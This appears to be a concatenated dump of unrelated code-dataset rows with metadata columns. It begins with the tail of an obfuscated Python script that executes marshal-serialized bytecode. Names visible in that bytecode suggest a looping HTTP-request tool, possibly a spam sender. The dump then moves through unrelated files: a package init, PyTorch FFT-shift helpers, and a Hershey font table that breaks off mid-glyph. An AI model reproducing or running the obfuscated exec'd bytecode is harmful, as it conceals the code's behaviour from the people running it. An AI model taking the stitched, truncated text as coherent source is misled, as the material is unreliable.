\xe9\x01\x00\x00\x00)\x19Z\x08requestsr\t\x00\x00\x00r\r\x00\x00\x00Z\x04json\xda\x04timer\x02\x00\x00\x00\xda\x01mr\x08\x00\x00\x00r\x07\x00\x00\x00\xda\x01b\xda\x01p\xda\x01ur\x11\x00\x00\x00r\x18\x00\x00\x00Z\x03banr\x06\x00\x00\x00Z\x03nom\xda\x03intZ\x03jml\xda\x05range\xda\x01x\xda\x03get\xda\x04textZ\x03calr\x0c\x00\x00\x00r\x0f\x00\x00\x00r\x0f\x00\x00\x00r\x0f\x00\x00\x00r\x10\x00\x00\x00\xda\x08<module>\n\x00\x00\x00s*\x00\x00\x00 \x01\x0c\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x02\x08\x0c\x08\x07\x8a\x01\x08\x01 \x01\x1e\x01\x0c\x01\x10\x01\n\x01&\x01\n\x02&\x01\x0c\x02)\x03\xda\x07marshal\xda\x04exec\xda\x05loads\xa9\x00r\x05\x00\x00\x00r\x05\x00\x00\x00\xda\x00\xda\x08<module>\x03\x00\x00\x00s\x02\x00\x00\x00\x08\x01'))
| 1,397.5
| 5,530
| 0.732021
| 1,216
| 5,590
| 3.300164
| 0.1875
| 0.201844
| 0.172689
| 0.227261
| 0.441814
| 0.388737
| 0.359831
| 0.314229
| 0.291802
| 0.291802
| 0
| 0.352519
| 0.027191
| 5,590
| 4
| 5,530
| 1,397.5
| 0.385436
| 0.007335
| 0
| 0
| 0
| 2
| 0.486842
| 0.469178
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 12
|
712c5ae8b15a0cf7a1905db3a6ce55acc0336956
| 104
|
py
|
Python
|
structmechmod/__init__.py
|
sisl/structmechmod
|
069d680822e9aae7e4e198454048be59d632415d
|
[
"MIT"
] | 5
|
2020-06-11T18:08:08.000Z
|
2020-12-28T15:24:46.000Z
|
structmechmod/__init__.py
|
sisl/structmechmod
|
069d680822e9aae7e4e198454048be59d632415d
|
[
"MIT"
] | 1
|
2020-10-21T04:46:32.000Z
|
2020-10-26T18:50:42.000Z
|
structmechmod/__init__.py
|
sisl/structmechmod
|
069d680822e9aae7e4e198454048be59d632415d
|
[
"MIT"
] | 2
|
2020-06-11T18:07:49.000Z
|
2020-11-13T17:00:34.000Z
|
from structmechmod import rigidbody
from structmechmod import trainer
from structmechmod import models
| 20.8
| 35
| 0.875
| 12
| 104
| 7.583333
| 0.5
| 0.56044
| 0.758242
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 104
| 4
| 36
| 26
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
857756fbb2a1d267ada189e634c659f5ce1ff32b
| 723
|
py
|
Python
|
libs/fft.py
|
gatheluck/FeatureVisualizer
|
cb35a2d9f6581f485638e8607a6ae15cdac886ec
|
[
"MIT"
] | null | null | null |
libs/fft.py
|
gatheluck/FeatureVisualizer
|
cb35a2d9f6581f485638e8607a6ae15cdac886ec
|
[
"MIT"
] | null | null | null |
libs/fft.py
|
gatheluck/FeatureVisualizer
|
cb35a2d9f6581f485638e8607a6ae15cdac886ec
|
[
"MIT"
] | null | null | null |
import torch
def fft_shift(input: torch.Tensor) -> torch.Tensor:
    """
    PyTorch version of np.fftshift

    Args
    - input: (Bx)CxHxWx2
    Return
    - ret: (Bx)CxHxWx2
    """
    # Spatial axes are H and W: skip the leading batch dim when present
    # (5-dim input) and always skip the trailing real/imag pair dim.
    first_spatial = 1 if input.dim() == 4 else 2
    dims = list(range(first_spatial, input.dim() - 1))
    shifts = [input.size(axis) // 2 for axis in dims]
    return torch.roll(input, shifts, dims)
def ifft_shift(input: torch.Tensor) -> torch.Tensor:
    """
    PyTorch version of np.ifftshift

    Args
    - input: (Bx)CxHxWx2
    Return
    - ret: (Bx)CxHxWx2
    """
    # Same spatial axes as fft_shift but walked in reverse (W then H);
    # the stop bound excludes the batch dim for 5-dim input.
    last_spatial = input.dim() - 2
    stop = 0 if input.dim() == 4 else 1
    dims = list(range(last_spatial, stop, -1))
    shifts = [input.size(axis) // 2 for axis in dims]
    return torch.roll(input, shifts, dims)
| 24.1
| 88
| 0.583679
| 111
| 723
| 3.783784
| 0.315315
| 0.095238
| 0.071429
| 0.1
| 0.852381
| 0.780952
| 0.780952
| 0.780952
| 0.780952
| 0.780952
| 0
| 0.028302
| 0.266943
| 723
| 29
| 89
| 24.931034
| 0.764151
| 0.24758
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.111111
| 0
| 0.555556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
859867a24e0aac1d56963e7038977cd9833ddd3a
| 45
|
py
|
Python
|
tests/testlib/testlib_a/sublib_b/__init__.py
|
bayashi-cl/expander
|
b3623b656a71801233797e05781295a6101fefd8
|
[
"CC0-1.0"
] | null | null | null |
tests/testlib/testlib_a/sublib_b/__init__.py
|
bayashi-cl/expander
|
b3623b656a71801233797e05781295a6101fefd8
|
[
"CC0-1.0"
] | 1
|
2022-03-12T20:41:21.000Z
|
2022-03-13T06:34:30.000Z
|
tests/testlib/testlib_a/sublib_b/__init__.py
|
bayashi-cl/expander
|
b3623b656a71801233797e05781295a6101fefd8
|
[
"CC0-1.0"
] | null | null | null |
from .sub_ba import print_name_sublib_sub_ba
| 22.5
| 44
| 0.888889
| 9
| 45
| 3.888889
| 0.777778
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088889
| 45
| 1
| 45
| 45
| 0.853659
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 8
|
a420821f20e11fb88460428f0caa416808391f4f
| 37,942
|
py
|
Python
|
hershey.py
|
chrisb2/air-quality
|
9dd0c7b836467b3a262d7e09ae86d4bce6ac8e00
|
[
"MIT"
] | 17
|
2018-07-24T17:41:58.000Z
|
2021-06-23T12:02:21.000Z
|
hershey.py
|
chrisb2/air-quality
|
9dd0c7b836467b3a262d7e09ae86d4bce6ac8e00
|
[
"MIT"
] | null | null | null |
hershey.py
|
chrisb2/air-quality
|
9dd0c7b836467b3a262d7e09ae86d4bce6ac8e00
|
[
"MIT"
] | 3
|
2018-07-24T17:41:59.000Z
|
2019-09-19T19:17:31.000Z
|
"""Hershey Vector Font.
See http://paulbourke.net/dataformats/hershey/
"""
# Simplex stroke table: one list per printable ASCII char (32-126).
# Each entry appears to be [vertex_count, width, x0,y0, x1,y1, ...] with
# -1,-1 acting as a pen-up separator and padding — TODO confirm against
# the Hershey format description linked above.
simplex = [
[0,16, # Ascii 32
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,10, # Ascii 33
5,21, 5, 7,-1,-1, 5, 2, 4, 1, 5, 0, 6, 1, 5, 2,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[5,16, # Ascii 34
4,21, 4,14,-1,-1,12,21,12,14,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[11,21, # Ascii 35
11,25, 4,-7,-1,-1,17,25,10,-7,-1,-1, 4,12,18,12,-1,-1, 3, 6,17, 6,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[26,20, # Ascii 36
8,25, 8,-4,-1,-1,12,25,12,-4,-1,-1,17,18,15,20,12,21, 8,21, 5,20, 3,
18, 3,16, 4,14, 5,13, 7,12,13,10,15, 9,16, 8,17, 6,17, 3,15, 1,12, 0,
8, 0, 5, 1, 3, 3,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[31,24, # Ascii 37
21,21, 3, 0,-1,-1, 8,21,10,19,10,17, 9,15, 7,14, 5,14, 3,16, 3,18, 4,
20, 6,21, 8,21,10,20,13,19,16,19,19,20,21,21,-1,-1,17, 7,15, 6,14, 4,
14, 2,16, 0,18, 0,20, 1,21, 3,21, 5,19, 7,17, 7,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[34,26, # Ascii 38
23,12,23,13,22,14,21,14,20,13,19,11,17, 6,15, 3,13, 1,11, 0, 7, 0, 5,
1, 4, 2, 3, 4, 3, 6, 4, 8, 5, 9,12,13,13,14,14,16,14,18,13,20,11,21,
9,20, 8,18, 8,16, 9,13,11,10,16, 3,18, 1,20, 0,22, 0,23, 1,23, 2,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[7,10, # Ascii 39
5,19, 4,20, 5,21, 6,20, 6,18, 5,16, 4,15,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[10,14, # Ascii 40
11,25, 9,23, 7,20, 5,16, 4,11, 4, 7, 5, 2, 7,-2, 9,-5,11,-7,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[10,14, # Ascii 41
3,25, 5,23, 7,20, 9,16,10,11,10, 7, 9, 2, 7,-2, 5,-5, 3,-7,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,16, # Ascii 42
8,21, 8, 9,-1,-1, 3,18,13,12,-1,-1,13,18, 3,12,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[5,26, # Ascii 43
13,18,13, 0,-1,-1, 4, 9,22, 9,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[8,10, # Ascii 44
6, 1, 5, 0, 4, 1, 5, 2, 6, 1, 6,-1, 5,-3, 4,-4,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[2,26, # Ascii 45
4, 9,22, 9,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[5,10, # Ascii 46
5, 2, 4, 1, 5, 0, 6, 1, 5, 2,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[2,22, # Ascii 47
20,25, 2,-7,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[17,20, # Ascii 48
9,21, 6,20, 4,17, 3,12, 3, 9, 4, 4, 6, 1, 9, 0,11, 0,14, 1,16, 4,17,
9,17,12,16,17,14,20,11,21, 9,21,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[4,20, # Ascii 49
6,17, 8,18,11,21,11, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[14,20, # Ascii 50
4,16, 4,17, 5,19, 6,20, 8,21,12,21,14,20,15,19,16,17,16,15,15,13,13,
10, 3, 0,17, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[15,20, # Ascii 51
5,21,16,21,10,13,13,13,15,12,16,11,17, 8,17, 6,16, 3,14, 1,11, 0, 8,
0, 5, 1, 4, 2, 3, 4,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[6,20, # Ascii 52
13,21, 3, 7,18, 7,-1,-1,13,21,13, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[17,20, # Ascii 53
15,21, 5,21, 4,12, 5,13, 8,14,11,14,14,13,16,11,17, 8,17, 6,16, 3,14,
1,11, 0, 8, 0, 5, 1, 4, 2, 3, 4,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[23,20, # Ascii 54
16,18,15,20,12,21,10,21, 7,20, 5,17, 4,12, 4, 7, 5, 3, 7, 1,10, 0,11,
0,14, 1,16, 3,17, 6,17, 7,16,10,14,12,11,13,10,13, 7,12, 5,10, 4, 7,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[5,20, # Ascii 55
17,21, 7, 0,-1,-1, 3,21,17,21,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[29,20, # Ascii 56
8,21, 5,20, 4,18, 4,16, 5,14, 7,13,11,12,14,11,16, 9,17, 7,17, 4,16,
2,15, 1,12, 0, 8, 0, 5, 1, 4, 2, 3, 4, 3, 7, 4, 9, 6,11, 9,12,13,13,
15,14,16,16,16,18,15,20,12,21, 8,21,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[23,20, # Ascii 57
16,14,15,11,13, 9,10, 8, 9, 8, 6, 9, 4,11, 3,14, 3,15, 4,18, 6,20, 9,
21,10,21,13,20,15,18,16,14,16, 9,15, 4,13, 1,10, 0, 8, 0, 5, 1, 4, 3,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[11,10, # Ascii 58
5,14, 4,13, 5,12, 6,13, 5,14,-1,-1, 5, 2, 4, 1, 5, 0, 6, 1, 5, 2,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[14,10, # Ascii 59
5,14, 4,13, 5,12, 6,13, 5,14,-1,-1, 6, 1, 5, 0, 4, 1, 5, 2, 6, 1, 6,
-1, 5,-3, 4,-4,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[3,24, # Ascii 60
20,18, 4, 9,20, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[5,26, # Ascii 61
4,12,22,12,-1,-1, 4, 6,22, 6,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[3,24, # Ascii 62
4,18,20, 9, 4, 0,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[20,18, # Ascii 63
3,16, 3,17, 4,19, 5,20, 7,21,11,21,13,20,14,19,15,17,15,15,14,13,13,
12, 9,10, 9, 7,-1,-1, 9, 2, 8, 1, 9, 0,10, 1, 9, 2,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,
-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1],
[55,27, # Ascii 64
18,13,17,15,15,16,12,16,10,15, 9,14, 8,11, 8, 8, 9, 6,11, 5,14, 5,16,
6,17, 8,-1,-1,12,16,10,14, 9,11, 9, 8,10, 6,11, 5,-1,-1,18,16,17, 8,
